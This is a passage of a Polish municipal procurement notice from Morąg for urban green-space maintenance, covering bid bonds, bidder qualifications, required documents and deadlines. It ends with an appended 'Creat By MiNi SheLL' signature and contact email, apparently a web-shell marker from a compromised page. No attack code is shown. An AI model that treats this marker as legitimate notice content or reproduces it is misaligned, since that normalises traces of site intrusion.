4)	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. Zaleca się wskazanie w ofercie nr rachunku bankowego, na który należy dokonać zwrotu.
Utrata wadium:
1)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej;
2)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp.
Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na załączniku nr 4 do SIWZ wymienionego w ust. 7 pkt. 7.1 Lp. 1 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia.
Zamawiający uzna warunek za spełniony poprzez wykazanie przez Wykonawcę, że w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał: 
jedno zadanie odpowiadające swoim rodzajem usługę stanowiącą przedmiot zamówienia, z podaniem  daty i podmiotu na rzecz którego wykonywał. 
Przez zadanie odpowiadające rodzajem usługę stanowiącą przedmiot zamówienia należy rozumieć:
- co najmniej jedno zadanie polegające na utrzymaniu i konserwacji terenów zieleni                 miejskiej nieprzerwanie przez okres minimum 1 roku o powierzchni nie mniejszej niż 70 000 m2 (nie można łączyć większej ilości zadań wykonywanych w różnym czasie celem uzyskania wymaganej powierzchni)
oraz  załączy dowody dotyczących tych usług, określające, czy usługi te zostały wykonane w sposób należyty oraz prawidłowo ukończone. 
a) dowodami potwierdzającymi czy usługi te zostały wykonane należycie oraz prawidłowo ukończone jest poświadczenie lub inny dokument potwierdzający należyte wykonanie prac.
b) w razie  konieczności, szczególnie gdy wykaz  usług lub dowody potwierdzające czy usługi te zostały wykonane należycie budzą wątpliwości zamawiającego,  zamawiający może zwrócić  się bezpośrednio do  właściwego  podmiotu, na rzecz którego  roboty były  wykonane, o przedłożenie  dodatkowych  informacji lub dokumentów  bezpośrednio zamawiającemu
c) Wykonawca, w miejsce poświadczeń, o których mowa w lit a) może przedkładać dokumenty potwierdzające należyte wykonanie prac, określone w § 1 ust. 1 pkt 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
Wykaz usług z podaniem miejsca i zakresu, czasu realizacji i podmiotów na rzecz których usługi  zostały wykonane należy wykonać wg wzoru Załącznika Nr 7.
Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.
W przypadku, gdy doświadczenie jest oddane do dyspozycji przez inny podmiot do realizacji zamówienia, to wykonawca zobowiązany jest do niniejszego wykazu dołączyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnego doświadczenia na okres korzystania z niego przy wykonywaniu zamówienia. Zobowiązanie należy dołączyć do oferty w oryginale.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają w/w warunek.
niają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym.
Wykonawca winien udokumentować posiadanie n/w sprzętu technicznego (narzędzi i urządzeń):
1.	Ciągnik o mocy min. 35 kM- 1 szt.
2.	Kosiarka spalinowa ręczna - 3 szt.
3.	Kosiarka samobieżna - 3 szt.
4.	Kosa mechaniczna spalinowa - 3 szt.
5.	Spalinowe nożyce do żywopłotów - 2szt.
6.	Piła spalinowa łańcuchowa - 1 szt.
7.	Mikrociągnik ogrodniczy o mocy min. 21 kM - 1 szt.
8.	Samochód dostawczy - 1 szt.
Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia stanowiącego                   Załącznik Nr 6 do SIWZ oraz złożonego oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na załączniku nr 4 do SIWZ wymienionego w ust. 7 pkt. 7.1 Lp. 1 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia.

Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający żąda, by wykonawca wykazał:
osobę odpowiedzialną za realizację usługi:
- posiadającą wykształcenie min. średnie ogrodnicze i staż pracy przy pielęgnacji zieleni - min. 5 lat
Wykształcenie osoby odpowiedzialnej za realizację usługi, powinno zostać potwierdzone dokumentami (dyplom, zaświadczenie, świadectwo, itp.).

Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia stanowiącego                   Załącznik Nr 5 do SIWZ oraz złożonego oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na załączniku nr 4 do SIWZ wymienionego w ust. 7 pkt. 7.1 Lp. 1 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej.
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp.
Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp na załączniku nr 4 do SIWZ wymienionego w ust. 7 pkt. 7.1 Lp. 1 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej jedno zadanie polegające na utrzymaniu i konserwacji terenów zieleni miejskiej nieprzerwanie przez okres minimum 1 roku o powierzchni nie mniejszej niż 70 000 m2 (nie można łączyć większej ilości zadań wykonywanych w różnym czasie celem uzyskania wymaganej powierzchni);</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy 2. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. 3. W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia oferty. 4. Wypełnione i podpisane oświadczenie dotyczące realizacji przedmiotu zamówienia z udziałem podwykonawstwa - składają tylko wykonawcy zamierzający przedmiot zamówienia realizować przy udziale podwykonawstwa (Załącznik nr 8).
5. Wypełniony harmonogram rzeczowo-finansowy (Załącznik Nr 9) 6. Dowód wpłaty wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Stosowanie środków ochrony roślin, które nie są szkodliwe dla pszczół - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień treści zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty dotyczącej przedmiotu niniejszego zamówienia publicznego. Szczegółowy opis warunków dokonania takich zmian znajduje się we wzorze umowy stanowiącym Załącznik nr 10 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/morag_gmina_miejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu, ul. 11 Listopada 9, 14-300 Morąg pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2015 godzina 09:00, miejsce: Urząd Miejski w Morągu, ul. 11 Listopada 9, 14-300 Morąg pokój nr 30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com